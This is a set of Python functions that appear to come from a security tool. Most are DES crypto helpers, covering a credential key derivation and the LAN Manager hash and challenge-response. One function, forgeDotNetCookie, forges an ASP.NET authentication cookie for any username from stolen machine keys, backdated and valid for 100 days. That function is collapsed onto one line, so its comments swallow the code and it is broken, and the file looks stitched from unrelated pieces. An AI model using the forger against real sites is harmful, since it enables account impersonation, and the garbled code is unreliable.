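def getSecretKey(self, uname, pwd):
    """Derive the secret key from a user name / password pair.

    The manipulated credential string returned by ``self.manip`` is
    DES-CBC encrypted twice under an all-zero IV: the first pass uses a
    fixed bootstrap key, the second pass uses the last 8 bytes of the
    first ciphertext as its key. The last 8 bytes of the second
    ciphertext are the result.

    Args:
        uname: user name, handed to ``self.manip``.
        pwd: password, handed to ``self.manip``.

    Returns:
        The trailing 8 bytes of the second ciphertext (a byte string).
    """
    manip = self.manip(uname, pwd)
    n = len(manip)
    zero_iv = "\0\0\0\0\0\0\0\0"
    # Fixed key and zero IV on both passes: there is no per-user salt, so
    # identical credentials always derive an identical key.
    deskey1 = binstring("0123456789ABCDEF")
    d = DES.DES(deskey1, DES.DES_CBC_MODE, IV=zero_iv)
    enc = d.encrypt(manip)
    # The last 8 bytes of the first ciphertext become the second-pass key.
    value1 = enc[n - 8:]
    d = DES.DES(value1, DES.DES_CBC_MODE, IV=zero_iv)
    enc = d.encrypt(manip)
    return enc[n - 8:]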
def getEncPassword(self, password, key):
    """Pad ``password`` via ``self.padStr`` and DES-CBC encrypt it under ``key``.

    An all-zero IV is used. The raw ciphertext is returned.
    """
    padded = self.padStr(password)
    cipher = DES.DES(key, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
    return cipher.encrypt(padded)
def calculate_lanman_response(key, challenge):
    """
    key has been generated with get_lanman_hash
    challenge is from remote server
    we return a 24 byte string (the response)
    """
    # Three 7-byte DES keys are cut from the 21-byte hash; the last slice is
    # null-padded if the supplied key is short.
    key1, key2, key3 = key[:7], key[7:14], key[14:]
    missing = 7 - len(key3)
    if missing > 0:
        key3 += "\x00" * missing
    # Each third of the hash independently encrypts the same challenge.
    parts = [DES.DES(k).encrypt(challenge) for k in (key1, key2, key3)]
    return parts[0] + parts[1] + parts[2]
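def get_lanman_hash(password):
    """
    gets a lanman hash given a password

    The password is upper-cased, null-padded or truncated to 14 bytes and
    split into two 7-byte DES keys, each encrypting the fixed constant.
    The 16-byte result is null-padded to 21 bytes so it can be fed to
    calculate_lanman_response. ``None`` is treated as the empty password.
    """
    if password is None:
        password = ""
    constant = "KGS!@#$%"
    # Case folding and the 14-byte cut follow the LM definition; the two
    # halves never interact, which is why this hash is considered weak.
    password = stroverwrite("\x00" * 14, password.upper(), 0)[:14]
    first = DES.DES(password[:7]).encrypt(constant)
    last = DES.DES(password[7:]).encrypt(constant)
    total = first + last
    # pad out to 21 bytes
    return total + "\x00" * (21 - len(total))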
def forgeDotNetCookie(encryptionkey, validationkey, username, apppath): cookie = "" # Genero los primeros 8 bytes random for i in range(8): cookie += chr(random.randint(0, 255)) #Ticket version cookie += "\x02" # username cookie += username.encode("utf-16-le") # End delimiter cookie += "\x00\x00" # issue date, we use "now" minus 10hours, just in case cookie += struct.pack("<Q", (time.time() - 10 * 60 * 60) * 10**8) # Ticket persistent cookie += "\x00" # Expiration date, we use "now" plus 100 days :) cookie += struct.pack("<Q", (time.time() + 24 * 60 * 60 * 100) * 10**8) #User data, we are not using it now cookie += "" # End delimiter cookie += "\x00\x00" # App path cookie += apppath.encode("utf-16-le") # End cookie delimiter cookie += "\x00\x00" # HMAC it! cookie += HMAC.new(validationkey.decode("hex"), cookie, SHA).digest() #Pad it devlog('dotnetcookie', "len del cookie: %d" % len(cookie)) if len(cookie) % 8 == 0: cookie += "\x08" * 8 else: devlog( 'dotnetcookie', '%s' % (chr(8 - len(cookie) % 8) * (8 - len(cookie) % 8)).encode("hex")) cookie += chr(8 - len(cookie) % 8) * (8 - len(cookie) % 8) devlog('dotnetcookie', "len del cookie: %d" % len(cookie)) # Now we encrypt it :) obj = DES.triple_des(encryptionkey.decode("hex"), DES.CBC, '\0' * 8) return obj.encrypt(cookie).encode("hex")
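def getPasswordKey(self, data, key):
    """DES-CBC decrypt ``data`` under ``key`` (zero IV) and return its last 8 bytes.

    Args:
        data: blob received from the server; normalised through ``binstring``.
        key: DES key previously derived from the user name / password.

    Returns:
        The trailing 8 bytes of the decrypted buffer; earlier blocks are
        discarded.
    """
    data = binstring(data)
    n = len(data)
    cipher = DES.DES(key, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
    dec = cipher.decrypt(data)
    return dec[n - 8:]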
def _encrypt(self, data):
    """3DES-CBC encrypt ``data`` with the hex-decoded ``self.encryptionkey`` and ``self.iv``."""
    key_bytes = self.encryptionkey.decode("hex")
    cipher = DES.triple_des(key_bytes, DES.CBC, self.iv)
    return cipher.encrypt(data)
def set_des(self, key, desMode=DES.DES_CBC_MODE):
    """Enable DES on this object and create encrypt/decrypt instances for ``key``.

    Both directions share the same key and ``desMode`` (CBC by default);
    the key is also stored so it can be reused later.
    """
    self.__mss_doDes = 1
    self.__mss_desKey = key
    encryptor = DES.DES(key, mode=desMode)
    decryptor = DES.DES(key, mode=desMode)
    self.__mss_DESENCRYPT = encryptor
    self.__mss_DESDECRYPT = decryptor